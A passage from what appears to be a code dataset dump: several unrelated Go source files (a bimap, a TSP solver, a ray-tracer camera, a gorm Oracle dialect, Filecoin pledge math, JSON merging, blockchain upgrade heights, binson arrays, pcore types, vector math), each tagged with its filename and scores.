key, _ := b.GetInverse(v)
b.s.Lock()
defer b.s.Unlock()
delete(b.inverse, v)
delete(b.forward, key)
}
// Size returns the number of elements in the bimap
func (b *BiMap) Size() int {
b.s.RLock()
defer b.s.RUnlock()
return len(b.forward)
}
// MakeImmutable freezes the BiMap preventing any further write actions from taking place
func (b *BiMap) MakeImmutable() {
b.s.Lock()
defer b.s.Unlock()
b.immutable = true
}
// GetInverseMap returns a regular go map mapping from the BiMap's values to its keys
func (b *BiMap) GetInverseMap() map[interface{}]interface{} {
return b.inverse
}
// GetForwardMap returns a regular go map mapping from the BiMap's keys to its values
func (b *BiMap) GetForwardMap() map[interface{}]interface{} {
return b.forward
}
// Lock manually locks the BiMap's mutex
func (b *BiMap) Lock() {
b.s.Lock()
}
// Unlock manually unlocks the BiMap's mutex
func (b *BiMap) Unlock() {
b.s.Unlock()
} | bimap.go | 0.757346 | 0.508788 | bimap.go | starcoder |
package circuit
import "github.com/heustis/tsp-solver-go/model"
// CompletedCircuit provides a no-op represenatation of a circuit, for use once an algorithm completes its computation.
// This allows for circuits with large memory requirements or circular references to be deleted without deleting the best computed circuit.
type CompletedCircuit struct {
Circuit []model.CircuitVertex
Length float64
}
// NewCompletedCircuit returns a CompletedCircuit containing the result of the supplied Circuit.
// This will only account for vertices that are already attached to the circuit; any unattached vertices will be ignored.
func NewCompletedCircuit(c model.Circuit) *CompletedCircuit {
return &CompletedCircuit{
Circuit: c.GetAttachedVertices(),
Length: c.GetLength(),
}
}
// CloneAndUpdate does nothing as the circuit is complete.
func (c *CompletedCircuit) CloneAndUpdate() ClonableCircuit {
return nil
}
// Delete is implemented for compatibility with ClonableCircuit.
func (c *CompletedCircuit) Delete() {
c.Circuit = nil
}
// FindNextVertexAndEdge determines the next vertex to add to the circuit, along with which edge it should be added to.
// This returns (nil,nil) because the circuit is complete.
func (c *CompletedCircuit) FindNextVertexAndEdge() (model.CircuitVertex, model.CircuitEdge) {
return nil, nil
}
// GetAttachedVertices returns all vertices that have been added to the circuit.
// This returns them in the order they should be traversed as part of the circuit.
func (c *CompletedCircuit) GetAttachedVertices() []model.CircuitVertex {
return c.Circuit
}
// GetLength returns the length of the circuit.
func (c *CompletedCircuit) GetLength() float64 {
return c.Length
}
// GetLengthWithNext returns the length of the circuit, since it is complete.
func (c *CompletedCircuit) GetLengthWithNext() float64 {
return c.Length
}
// GetUnattachedVertices returns an empty map, since the circuit is complete.
func (c *CompletedCircuit) GetUnattachedVertices() map[model.CircuitVertex]bool {
return make(map[model.CircuitVertex]bool)
}
// Update does nothing as the circuit is complete.
func (c *CompletedCircuit) Update(vertexToAdd model.CircuitVertex, edgeToSplit model.CircuitEdge) {
}
var _ ClonableCircuit = (*CompletedCircuit)(nil)
var _ model.Circuit = (*CompletedCircuit)(nil) | circuit/completed.go | 0.892234 | 0.640397 | completed.go | starcoder |
package scene
import (
"math"
"sync"
"github.com/carlosroman/aun-otra-ray-tracer/go/internal/object"
"github.com/carlosroman/aun-otra-ray-tracer/go/internal/ray"
)
func NewCamera(hSize, vSize int, from, to, vup ray.Vector) (c Camera, err error) {
return newCamera(hSize, vSize, math.Pi/2, ray.ViewTransform(from, to, vup))
}
func NewBasicCamera(hSize, vSize int, fieldOfView float64) (c Camera, err error) {
return newCamera(hSize, vSize, fieldOfView, ray.IdentityMatrix(4, 4))
}
func newCamera(hSize, vSize int, fieldOfView float64, transform ray.Matrix) (c Camera, err error) {
pixelSize, halfWidth, halfHeight := calculatePixelSize(hSize, vSize, fieldOfView)
inverse, err := transform.Inverse()
return &camera{
hSize: hSize,
vSize: vSize,
fieldOfView: fieldOfView,
origin: ray.NewPoint(0, 0, 0),
focalLength: 1.0,
transform: transform,
transformInverse: inverse,
pixelSize: pixelSize,
halfWidth: halfWidth,
halfHeight: halfHeight,
}, err
}
type Camera interface {
HSize() int
VSize() int
Origin() ray.Vector
PixelSize() float64
FocalLength() float64
RayForPixel(nx, ny float64) ray.Ray
FieldOfView() float64
SetTransform(by ray.Matrix) error
}
type camera struct {
hSize int
vSize int
fieldOfView float64
focalLength float64
origin ray.Vector
transform ray.Matrix
transformInverse ray.Matrix
pixelSize float64
halfWidth float64
halfHeight float64
}
func (c camera) HSize() int {
return c.hSize
}
func (c camera) VSize() int {
return c.vSize
}
func (c camera) FocalLength() float64 {
return c.focalLength
}
func (c camera) FieldOfView() float64 {
return c.fieldOfView
}
func calculatePixelSize(hSize, vSize int, fieldOfView float64) (pixelSize, halfWidth, halfHeight float64) {
// half_view ← tan(camera.field_of_view / 2)
halfView := math.Tan(fieldOfView / 2)
aspect := float64(hSize) / float64(vSize)
if aspect >= 1 {
halfWidth = halfView
halfHeight = halfView / aspect
} else {
halfWidth = halfView * aspect
halfHeight = halfView
}
pixelSize = (halfWidth * 2) / float64(hSize)
return
}
func (c camera) PixelSize() float64 {
return c.pixelSize
}
func (c *camera) SetTransform(by ray.Matrix) error {
c.transform = by
inverse, err := by.Inverse()
c.transformInverse = inverse
return err
}
func (c camera) RayForPixel(nx, ny float64) ray.Ray {
// the offset from the edge of the canvas to the pixel's center
xOffset := (nx + 0.5) * c.pixelSize
yOffset := (ny + 0.5) * c.pixelSize
// the untransformed coordinates of the pixel in world space.
// (remember that the camera looks toward -z, so +x is to the *left*.)
worldX := c.halfWidth - xOffset
worldY := c.halfHeight - yOffset
// using the camera matrix, transform the canvas point and the origin
// and then compute the ray's direction vector.
// (remember that the canvas is at z=-1)
// pixel ← inverse(camera.transform) * point(world_x, world_y, -1)
inv := c.transformInverse
pixel := inv.MultiplyByVector(ray.NewPoint(worldX, worldY, -c.focalLength))
origin := inv.MultiplyByVector(c.origin)
// lower_left_corner = origin - horizontal/2 - vertical/2 - vec3(0, 0, focal_length)
// lower_left_corner + u*horizontal + v*vertical - origin
// direction ← normalize(pixel - origin)
direction := pixel.Subtract(origin).Normalize()
return ray.NewRayAt(origin, direction)
}
func (c camera) Origin() ray.Vector {
return c.origin
}
func MultiThreadedRender(c Camera, w World, noOfWorkers, queueSize int) Canvas {
canvas := NewCanvas(c.HSize(), c.VSize())
const cl = 255.99
type result struct {
color object.RGB
x, y int
}
ch := make(chan result, queueSize)
calcCh := make(chan result, queueSize)
done := make(chan bool)
workersWg := sync.WaitGroup{}
workersWg.Add(noOfWorkers)
canvasWg := sync.WaitGroup{}
canvasWg.Add(c.HSize() * c.VSize())
go func() {
for out := range ch {
canvas[out.x][out.y] = out.color
canvasWg.Done()
}
done <- true
}()
for workers := 0; workers < noOfWorkers; workers++ {
go func() {
for res := range calcCh {
r := c.RayForPixel(float64(res.x), float64(res.y))
res.color = w.ColorAt(r, defaultRecursiveDepth)
ch <- res
}
workersWg.Done()
}()
}
for y := 0; y < c.VSize()-1; y++ {
for x := 0; x < c.HSize()-1; x++ {
calcCh <- result{
x: x,
y: y,
}
}
}
close(calcCh)
workersWg.Wait()
canvasWg.Done()
close(ch)
<-done
close(done)
return canvas
}
func Render(c Camera, w World) Canvas {
canvas := NewCanvas(c.HSize(), c.VSize())
const cl = 255.99
for y := 0; y < c.VSize()-1; y++ {
for x := 0; x < c.HSize()-1; x++ {
r := c.RayForPixel(float64(x), float64(y))
canvas[x][y] = w.ColorAt(r, defaultRecursiveDepth)
}
}
return canvas
}
const (
defaultRecursiveDepth = 5
) | go/internal/scene/camera.go | 0.813905 | 0.484136 | camera.go | starcoder |
package gorm
import (
"crypto/sha1"
"fmt"
"reflect"
"regexp"
"strconv"
"strings"
"time"
"unicode/utf8"
)
type oracle struct {
commonDialect
}
func init() {
RegisterDialect("oci8", &oracle{})
}
func (oracle) GetName() string {
return "oci8"
}
func (oracle) Quote(key string) string {
return fmt.Sprintf("\"%s\"", strings.ToUpper(key))
}
func (oracle) SelectFromDummyTable() string {
return "FROM dual"
}
func (oracle) BindVar(i int) string {
return fmt.Sprintf(":%d", i)
}
func (s *oracle) DataTypeOf(field *StructField) string {
var dataValue, sqlType, size, additionalType = ParseFieldStructForDialect(field, s)
if sqlType == "" {
switch dataValue.Kind() {
case reflect.Bool:
sqlType = "CHAR(1)"
case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uintptr:
sqlType = "INTEGER"
case reflect.Int64, reflect.Uint64:
sqlType = "NUMBER"
case reflect.Float32, reflect.Float64:
sqlType = "FLOAT"
case reflect.String:
if size > 0 && size < 255 {
sqlType = fmt.Sprintf("VARCHAR(%d)", size)
} else {
sqlType = "VARCHAR(255)"
}
case reflect.Struct:
if _, ok := dataValue.Interface().(time.Time); ok {
sqlType = "TIMESTAMP"
}
}
}
if sqlType == "" {
panic(fmt.Sprintf("invalid sql type %s (%s) for oci8", dataValue.Type().Name(), dataValue.Kind().String()))
}
if strings.TrimSpace(additionalType) == "" {
return sqlType
}
return fmt.Sprintf("%v %v", sqlType, additionalType)
}
func (s oracle) HasIndex(tableName string, indexName string) bool {
var count int
s.db.QueryRow("SELECT COUNT(*) FROM USER_INDEXES WHERE TABLE_NAME = :1 AND INDEX_NAME = :2", strings.ToUpper(tableName), strings.ToUpper(indexName)).Scan(&count)
return count > 0
}
func (s oracle) HasForeignKey(tableName string, foreignKeyName string) bool {
var count int
s.db.QueryRow("SELECT COUNT(*) FROM USER_CONSTRAINTS WHERE CONSTRAINT_TYPE = 'R' AND TABLE_NAME = :1 AND CONSTRAINT_NAME = :2", strings.ToUpper(tableName), strings.ToUpper(foreignKeyName)).Scan(&count)
return count > 0
}
func (s oracle) HasTable(tableName string) bool {
var count int
s.db.QueryRow("SELECT COUNT(*) FROM USER_TABLES WHERE TABLE_NAME = :1", strings.ToUpper(tableName)).Scan(&count)
return count > 0
}
func (s oracle) HasColumn(tableName string, columnName string) bool {
var count int
s.db.QueryRow("SELECT COUNT(*) FROM USER_TAB_COLUMNS WHERE TABLE_NAME = :1 AND COLUMN_NAME = :2", strings.ToUpper(tableName), strings.ToUpper(columnName)).Scan(&count)
return count > 0
}
func (oracle) LimitAndOffsetSQL(limit, offset interface{}) (sql string, err error) {
if limit != nil {
if parsedLimit, err := strconv.ParseInt(fmt.Sprint(limit), 0, 0); err == nil && parsedLimit >= 0 {
sql += fmt.Sprintf("ROWNUM <= %d", limit)
}
if err != nil {
return "", err
}
}
return
}
func (s oracle) BuildKeyName(kind, tableName string, fields ...string) string {
keyName := s.commonDialect.BuildKeyName(kind, tableName, fields...)
if utf8.RuneCountInString(keyName) <= 30 {
return keyName
}
h := sha1.New()
h.Write([]byte(keyName))
bs := h.Sum(nil)
// sha1 is 40 digits, keep first 24 characters of destination
destRunes := []rune(regexp.MustCompile("(_*[^a-zA-Z]+_*|_+)").ReplaceAllString(fields[0], "_"))
result := fmt.Sprintf("%s%x", string(destRunes), bs)
if len(result) <= 30 {
return result
}
return result[:29]
} | dialects_oracle_oci8.go | 0.540924 | 0.412057 | dialects_oracle_oci8.go | starcoder |
package miner
import (
"github.com/filecoin-project/specs-actors/actors/abi"
"github.com/filecoin-project/specs-actors/actors/abi/big"
"github.com/filecoin-project/specs-actors/actors/builtin"
"github.com/filecoin-project/specs-actors/actors/util/math"
"github.com/filecoin-project/specs-actors/actors/util/smoothing"
)
// IP = IPBase(precommit time) + AdditionalIP(precommit time)
// IPBase(t) = BR(t, InitialPledgeProjectionPeriod)
// AdditionalIP(t) = LockTarget(t)*PledgeShare(t)
// LockTarget = (LockTargetFactorNum / LockTargetFactorDenom) * FILCirculatingSupply(t)
// PledgeShare(t) = sectorQAPower / max(BaselinePower(t), NetworkQAPower(t))
// PARAM_FINISH
var PreCommitDepositFactor = 20
var InitialPledgeFactor = 20
var PreCommitDepositProjectionPeriod = abi.ChainEpoch(PreCommitDepositFactor) * builtin.EpochsInDay
var InitialPledgeProjectionPeriod = abi.ChainEpoch(InitialPledgeFactor) * builtin.EpochsInDay
var LockTargetFactorNum = big.NewInt(3)
var LockTargetFactorDenom = big.NewInt(10)
// FF = BR(t, DeclaredFaultProjectionPeriod)
// projection period of 2.14 days: 2880 * 2.14 = 6163.2. Rounded to nearest epoch 6163
var DeclaredFaultFactorNum = 214
var DeclaredFaultFactorDenom = 100
var DeclaredFaultProjectionPeriod = abi.ChainEpoch((builtin.EpochsInDay * DeclaredFaultFactorNum) / DeclaredFaultFactorDenom)
// SP = BR(t, UndeclaredFaultProjectionPeriod)
var UndeclaredFaultProjectionPeriod = abi.ChainEpoch(5) * builtin.EpochsInDay
// Maximum number of days of BR a terminated sector can be penalized
const TerminationLifetimeCap = abi.ChainEpoch(70)
// This is the BR(t) value of the given sector for the current epoch.
// It is the expected reward this sector would pay out over a one day period.
// BR(t) = CurrEpochReward(t) * SectorQualityAdjustedPower * EpochsInDay / TotalNetworkQualityAdjustedPower(t)
func ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower, projectionDuration abi.ChainEpoch) abi.TokenAmount {
networkQAPowerSmoothed := networkQAPowerEstimate.Estimate()
if networkQAPowerSmoothed.IsZero() {
return rewardEstimate.Estimate()
}
expectedRewardForProvingPeriod := smoothing.ExtrapolatedCumSumOfRatio(projectionDuration, 0, rewardEstimate, networkQAPowerEstimate)
br := big.Mul(qaSectorPower, expectedRewardForProvingPeriod) // Q.0 * Q.128 => Q.128
return big.Rsh(br, math.Precision)
}
// This is the FF(t) penalty for a sector expected to be in the fault state either because the fault was declared or because
// it has been previously detected by the network.
// FF(t) = DeclaredFaultFactor * BR(t)
func PledgePenaltyForDeclaredFault(rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower) abi.TokenAmount {
return ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate, qaSectorPower, DeclaredFaultProjectionPeriod)
}
// This is the SP(t) penalty for a newly faulty sector that has not been declared.
// SP(t) = UndeclaredFaultFactor * BR(t)
func PledgePenaltyForUndeclaredFault(rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower) abi.TokenAmount {
return ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate, qaSectorPower, UndeclaredFaultProjectionPeriod)
}
// Penalty to locked pledge collateral for the termination of a sector before scheduled expiry.
// SectorAge is the time between the sector's activation and termination.
func PledgePenaltyForTermination(dayRewardAtActivation, twentyDayRewardAtActivation abi.TokenAmount, sectorAge abi.ChainEpoch, rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower) abi.TokenAmount {
// max(SP(t), BR(StartEpoch, 20d) + BR(StartEpoch, 1d)*min(SectorAgeInDays, 70))
// and sectorAgeInDays = sectorAge / EpochsInDay
cappedSectorAge := big.NewInt(int64(minEpoch(sectorAge, TerminationLifetimeCap*builtin.EpochsInDay)))
return big.Max(
PledgePenaltyForUndeclaredFault(rewardEstimate, networkQAPowerEstimate, qaSectorPower),
big.Add(
twentyDayRewardAtActivation,
big.Div(
big.Mul(dayRewardAtActivation, cappedSectorAge),
big.NewInt(builtin.EpochsInDay))))
}
// Computes the PreCommit Deposit given sector qa weight and current network conditions.
// PreCommit Deposit = 20 * BR(t)
func PreCommitDepositForPower(rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower) abi.TokenAmount {
return ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate, qaSectorPower, PreCommitDepositProjectionPeriod)
}
// Computes the pledge requirement for committing new quality-adjusted power to the network, given the current
// total power, total pledge commitment, epoch block reward, and circulating token supply.
// In plain language, the pledge requirement is a multiple of the block reward expected to be earned by the
// newly-committed power, holding the per-epoch block reward constant (though in reality it will change over time).
func InitialPledgeForPower(qaPower abi.StoragePower, baselinePower abi.StoragePower, networkTotalPledge abi.TokenAmount, rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, networkCirculatingSupplySmoothed abi.TokenAmount) abi.TokenAmount {
networkQAPower := networkQAPowerEstimate.Estimate()
ipBase := ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate, qaPower, InitialPledgeProjectionPeriod)
lockTargetNum := big.Mul(LockTargetFactorNum, networkCirculatingSupplySmoothed)
lockTargetDenom := LockTargetFactorDenom
pledgeShareNum := qaPower
pledgeShareDenom := big.Max(big.Max(networkQAPower, baselinePower), qaPower) // use qaPower in case others are 0
additionalIPNum := big.Mul(lockTargetNum, pledgeShareNum)
additionalIPDenom := big.Mul(lockTargetDenom, pledgeShareDenom)
additionalIP := big.Div(additionalIPNum, additionalIPDenom)
return big.Add(ipBase, additionalIP)
} | actors/builtin/miner/monies.go | 0.637144 | 0.412619 | monies.go | starcoder |
package merge
type Interface interface {
Merge(dst interface{}, src interface{}) (interface{}, bool)
}
type detectType uint
const (
noneType detectType = iota
mapType
arrayType
)
type JSONMerge struct{}
func NewJSONMerge() Interface {
return &JSONMerge{}
}
func (m *JSONMerge) Merge(dst interface{}, src interface{}) (interface{}, bool) {
switch {
case dst == nil && src != nil:
result := src
return result, true
case dst == nil && src == nil, dst != nil && src == nil:
result := dst
return result, false
default:
return m.processing(dst, src)
}
}
func (m *JSONMerge) processing(dst interface{}, src interface{}) (interface{}, bool) {
dstType := m.typeDetect(dst)
srcType := m.typeDetect(src)
switch {
case dstType == srcType && srcType == arrayType:
dstARRAY, _ := dst.([]interface{})
srcARRAY, _ := src.([]interface{})
return m.mergeARRAY(dstARRAY, srcARRAY), true
case dstType == srcType && srcType == mapType:
dstMAP, _ := dst.(map[string]interface{})
srcMAP, _ := src.(map[string]interface{})
return m.mergeMAP(dstMAP, srcMAP), true
default:
result := src
return result, false
}
}
func (m *JSONMerge) typeDetect(input interface{}) detectType {
if _, ok := input.([]interface{}); ok {
return arrayType
}
if _, ok := input.(map[string]interface{}); ok {
return mapType
}
return noneType
}
func (m *JSONMerge) mergeARRAY(dst []interface{}, src []interface{}) []interface{} {
var result []interface{}
if len(src) > len(dst) {
result = make([]interface{}, len(src))
} else {
result = make([]interface{}, len(dst))
}
for i := range dst {
result[i] = dst[i]
}
for i := range src {
result[i] = src[i]
}
return result
}
func (m *JSONMerge) mergeMAP(dst map[string]interface{}, src map[string]interface{}) map[string]interface{} {
result := dst
for i := range src {
if _, ok := result[i]; !ok || m.typeDetect(result[i]) == noneType {
if result == nil {
result = make(map[string]interface{})
}
result[i] = src[i]
continue
}
result[i], _ = m.Merge(result[i], src[i])
}
return result
} | internal/merge/merge.go | 0.584745 | 0.411998 | merge.go | starcoder |
package config
import (
"log"
"github.com/iotexproject/iotex-core/blockchain/genesis"
)
// Codename for height upgrades
const (
Pacific = iota
Aleutian
Bering
Cook
Dardanelles
Daytona
Easter
Fairbank
)
type (
// HeightName is codename for height upgrades
HeightName int
// HeightUpgrade lists heights at which certain fixes take effect
// prior to Dardanelles, each epoch consists of 360 sub-epochs
// so height = 360k + 1
// starting Dardanelles, each epoch consists of 720 sub-epochs
// however, DardanellesHeight is set to 360(2k + 1) + 1 (instead of 720k + 1)
// so height afterwards must be set to 360(2k + 1) + 1
HeightUpgrade struct {
pacificHeight uint64
aleutianHeight uint64
beringHeight uint64
cookHeight uint64
dardanellesHeight uint64
daytonaHeight uint64
easterHeight uint64
fairbankHeight uint64
}
)
// NewHeightUpgrade creates a height upgrade config
func NewHeightUpgrade(cfg *genesis.Genesis) HeightUpgrade {
return HeightUpgrade{
cfg.PacificBlockHeight,
cfg.AleutianBlockHeight,
cfg.BeringBlockHeight,
cfg.CookBlockHeight,
cfg.DardanellesBlockHeight,
cfg.DaytonaBlockHeight,
cfg.EasterBlockHeight,
cfg.FairbankBlockHeight,
}
}
// IsPost return true if height is after the height upgrade
func (hu *HeightUpgrade) IsPost(name HeightName, height uint64) bool {
var h uint64
switch name {
case Pacific:
h = hu.pacificHeight
case Aleutian:
h = hu.aleutianHeight
case Bering:
h = hu.beringHeight
case Cook:
h = hu.cookHeight
case Dardanelles:
h = hu.dardanellesHeight
case Daytona:
h = hu.daytonaHeight
case Easter:
h = hu.easterHeight
case Fairbank:
h = hu.fairbankHeight
default:
log.Panic("invalid height name!")
}
return height >= h
}
// IsPre return true if height is before the height upgrade
func (hu *HeightUpgrade) IsPre(name HeightName, height uint64) bool {
return !hu.IsPost(name, height)
}
// PacificBlockHeight returns the pacific height
func (hu *HeightUpgrade) PacificBlockHeight() uint64 { return hu.pacificHeight }
// AleutianBlockHeight returns the aleutian height
func (hu *HeightUpgrade) AleutianBlockHeight() uint64 { return hu.aleutianHeight }
// BeringBlockHeight returns the bering height
func (hu *HeightUpgrade) BeringBlockHeight() uint64 { return hu.beringHeight }
// CookBlockHeight returns the cook height
func (hu *HeightUpgrade) CookBlockHeight() uint64 { return hu.cookHeight }
// DardanellesBlockHeight returns the dardanelles height
func (hu *HeightUpgrade) DardanellesBlockHeight() uint64 { return hu.dardanellesHeight }
// DaytonaBlockHeight returns the daytona height
func (hu *HeightUpgrade) DaytonaBlockHeight() uint64 { return hu.daytonaHeight }
// EasterBlockHeight returns the easter height
func (hu *HeightUpgrade) EasterBlockHeight() uint64 { return hu.easterHeight }
// FairbankBlockHeight returns the fairbank height
func (hu *HeightUpgrade) FairbankBlockHeight() uint64 { return hu.fairbankHeight } | config/heightupgrade.go | 0.678859 | 0.405566 | heightupgrade.go | starcoder |
package binson
import (
"fmt"
)
// Returns a new empty binson array.
func NewBinsonArray() *BinsonArray {
a := BinsonArray([]field{})
return &a
}
// Return length of binson array.
func (a *BinsonArray) Size() int{
return len(*a);
}
// Removes a given field if it exists.
func (a *BinsonArray) Remove(index int){
*a = append( (*a)[:index], (*a)[index+1:]...)
}
func (a *BinsonArray) inRange(index int) bool{
return index < 0 || a.Size() <= index
}
func (a *BinsonArray) HasArray(index int) bool {
if a.inRange(index){
return false
}
_, ok := (*a)[index].(*BinsonArray)
return ok
}
func (a *BinsonArray) GetArray(index int) (*BinsonArray, bool) {
obj, ok := (*a)[index].(*BinsonArray)
return obj, ok
}
func (a *BinsonArray) HasBinson(index int) bool {
if a.inRange(index){
return false
}
_, ok := (*a)[index].(Binson)
return ok
}
func (a *BinsonArray) GetBinson(index int) (Binson, bool) {
obj, ok := (*a)[index].(Binson)
return obj, ok
}
func (a *BinsonArray) HasInt(index int) bool {
if a.inRange(index){
return false
}
_, ok := (*a)[index].(binsonInt)
return ok
}
func (a *BinsonArray) GetInt(index int) (int64, bool) {
obj, ok := (*a)[index].(binsonInt)
return int64(obj), ok
}
func (a *BinsonArray) HasString(index int) bool {
if a.inRange(index){
return false
}
_, ok := (*a)[index].(binsonString)
return ok
}
func (a *BinsonArray) GetString(index int) (string, bool) {
obj, ok := (*a)[index].(binsonString)
return string(obj), ok
}
func (a *BinsonArray) HasBytes(index int) bool {
if a.inRange(index){
return false
}
_, ok := (*a)[index].(binsonBytes)
return ok
}
func (a *BinsonArray) GetBytes(index int) ([]byte, bool) {
obj, ok := (*a)[index].(binsonBytes)
return []byte(obj), ok
}
func (a *BinsonArray) HasBool(index int) bool {
if a.inRange(index){
return false
}
_, ok := (*a)[index].(binsonBool)
return ok
}
func (a *BinsonArray) GetBool(index int) (bool, bool) {
obj, ok := (*a)[index].(binsonBool)
return bool(obj), ok
}
func (a *BinsonArray) HasFloat(index int) bool {
if a.inRange(index){
return false
}
_, ok := (*a)[index].(binsonFloat)
return ok
}
func (a *BinsonArray) GetFloat(index int) (float64, bool) {
obj, ok := (*a)[index].(binsonFloat)
return float64(obj), ok
}
func (a *BinsonArray) addField(value field) *BinsonArray {
*a = append(*a, value)
return a
}
// Adds an element to the array.
func (a *BinsonArray) Put(value interface{}) (*BinsonArray){
switch o := value.(type) {
case Binson:
a.addField(o)
case *BinsonArray:
a.addField(o)
case int:
a.addField(binsonInt(int64(o)))
case int64:
a.addField(binsonInt(o))
case string:
a.addField(binsonString(o))
case []byte:
a.addField(binsonBytes(o))
case bool:
a.addField(binsonBool(o))
case float64:
a.addField(binsonFloat(o))
default:
panic(fmt.Sprintf("%T is not handeled by Binson", o))
}
return a
} | binson_array.go | 0.669637 | 0.442576 | binson_array.go | starcoder |
package types
import (
"io"
"reflect"
"github.com/lyraproj/pcore/px"
)
type NotUndefType struct {
typ px.Type
}
var NotUndefMetaType px.ObjectType
func init() {
NotUndefMetaType = newObjectType(`Pcore::NotUndefType`,
`Pcore::AnyType {
attributes => {
type => {
type => Optional[Type],
value => Any
},
}
}`, func(ctx px.Context, args []px.Value) px.Value {
return newNotUndefType2(args...)
})
}
func DefaultNotUndefType() *NotUndefType {
return notUndefTypeDefault
}
func NewNotUndefType(containedType px.Type) *NotUndefType {
if containedType == nil || containedType == anyTypeDefault {
return DefaultNotUndefType()
}
return &NotUndefType{containedType}
}
func newNotUndefType2(args ...px.Value) *NotUndefType {
switch len(args) {
case 0:
return DefaultNotUndefType()
case 1:
if containedType, ok := args[0].(px.Type); ok {
return NewNotUndefType(containedType)
}
if containedType, ok := args[0].(stringValue); ok {
return newNotUndefType3(string(containedType))
}
panic(illegalArgumentType(`NotUndef[]`, 0, `Variant[Type,String]`, args[0]))
default:
panic(illegalArgumentCount(`NotUndef[]`, `0 - 1`, len(args)))
}
}
func newNotUndefType3(str string) *NotUndefType {
return &NotUndefType{NewStringType(nil, str)}
}
func (t *NotUndefType) Accept(v px.Visitor, g px.Guard) {
v(t)
t.typ.Accept(v, g)
}
func (t *NotUndefType) ContainedType() px.Type {
return t.typ
}
func (t *NotUndefType) Default() px.Type {
return notUndefTypeDefault
}
func (t *NotUndefType) Equals(o interface{}, g px.Guard) bool {
if ot, ok := o.(*NotUndefType); ok {
return t.typ.Equals(ot.typ, g)
}
return false
}
func (t *NotUndefType) Generic() px.Type {
return NewNotUndefType(px.GenericType(t.typ))
}
func (t *NotUndefType) Get(key string) (value px.Value, ok bool) {
switch key {
case `type`:
return t.typ, true
}
return nil, false
}
func (t *NotUndefType) IsAssignable(o px.Type, g px.Guard) bool {
return !GuardedIsAssignable(o, undefTypeDefault, g) && GuardedIsAssignable(t.typ, o, g)
}
func (t *NotUndefType) IsInstance(o px.Value, g px.Guard) bool {
return o != undef && GuardedIsInstance(t.typ, o, g)
}
func (t *NotUndefType) MetaType() px.ObjectType {
return NotUndefMetaType
}
func (t *NotUndefType) Name() string {
return `NotUndef`
}
func (t *NotUndefType) Parameters() []px.Value {
if t.typ == DefaultAnyType() {
return px.EmptyValues
}
if str, ok := t.typ.(*vcStringType); ok && str.value != `` {
return []px.Value{stringValue(str.value)}
}
return []px.Value{t.typ}
}
func (t *NotUndefType) Resolve(c px.Context) px.Type {
t.typ = resolve(c, t.typ)
return t
}
func (t *NotUndefType) ReflectType(c px.Context) (reflect.Type, bool) {
return ReflectType(c, t.typ)
}
func (t *NotUndefType) CanSerializeAsString() bool {
return canSerializeAsString(t.typ)
}
func (t *NotUndefType) SerializationString() string {
return t.String()
}
func (t *NotUndefType) String() string {
return px.ToString2(t, None)
}
func (t *NotUndefType) ToString(b io.Writer, s px.FormatContext, g px.RDetect) {
TypeToString(t, b, s, g)
}
func (t *NotUndefType) PType() px.Type {
return &TypeType{t}
}
var notUndefTypeDefault = &NotUndefType{typ: anyTypeDefault} | types/notundeftype.go | 0.570092 | 0.423577 | notundeftype.go | starcoder |
package vector
import (
"fmt"
"math"
"github.com/downflux/go-geometry/epsilon"
)
type D int
const (
// AXIS_X is a common alias for the first dimension.
AXIS_X D = iota
// AXIS_Y is a common alias for the second dimension.
AXIS_Y
// AXIS_Z is a common alias for the third dimension.
AXIS_Z
// AXIS_W is a common alias for the fourth dimension.
AXIS_W
)
// V is an n-length vector.
type V []float64
func New(xs ...float64) *V {
v := V(xs)
return &v
}
// Dimension returns the dimension of the vector.
func (v V) Dimension() D { return D(len(v)) }
func (v V) X(i D) float64 {
if i >= v.Dimension() {
panic(fmt.Sprintf("cannot access %v-dimensional data in a %v dimensional vector", i+1, v.Dimension()))
}
return v[i]
}
func SquaredMagnitude(v V) float64 { return Dot(v, v) }
func Magnitude(v V) float64 { return math.Sqrt(SquaredMagnitude(v)) }
func Unit(v V) V { return Scale(1/Magnitude(v), v) }
func UnitBuf(v V, b V) { ScaleBuf(1/Magnitude(v), v, b) }
func Dot(v V, u V) float64 {
r := 0.0
if v.Dimension() != u.Dimension() {
panic("mismatching vector dimensions")
}
for i := D(0); i < v.Dimension(); i++ {
r += v[i] * u[i]
}
return r
}
func Add(v V, u V) V {
if v.Dimension() != u.Dimension() {
panic("mismatching vector dimensions")
}
b := V(make([]float64, v.Dimension()))
AddBuf(v, u, b)
return b
}
func AddBuf(v V, u V, b V) {
if (v.Dimension() != u.Dimension()) || (v.Dimension() != b.Dimension()) {
panic("mismatching vector dimensions")
}
for i := D(0); i < v.Dimension(); i++ {
b[i] = v[i] + u[i]
}
}
func Sub(v V, u V) V {
if v.Dimension() != u.Dimension() {
panic("mismatching vector dimensions")
}
b := V(make([]float64, v.Dimension()))
SubBuf(v, u, b)
return b
}
func SubBuf(v V, u V, b V) {
if (v.Dimension() != u.Dimension()) || (v.Dimension() != b.Dimension()) {
panic("mismatching vector dimensions")
}
for i := D(0); i < v.Dimension(); i++ {
b[i] = v[i] - u[i]
}
}
func Scale(c float64, v V) V {
b := V(make([]float64, v.Dimension()))
ScaleBuf(c, v, b)
return b
}
func ScaleBuf(c float64, v V, b V) {
if v.Dimension() != b.Dimension() {
panic("mismatching vector dimensions")
}
for i := D(0); i < v.Dimension(); i++ {
b[i] = c * v[i]
}
}
func Within(v V, u V) bool {
for i := D(0); i < v.Dimension(); i++ {
if !epsilon.Within(u[i], v[i]) {
return false
}
}
return true
}
func IsOrthogonal(v V, u V) bool { return Dot(v, u) == 0 } | nd/vector/vector.go | 0.843766 | 0.515071 | vector.go | starcoder |
package egc
// Det2x2 -- computes the determinant of a 2x2 matrix.
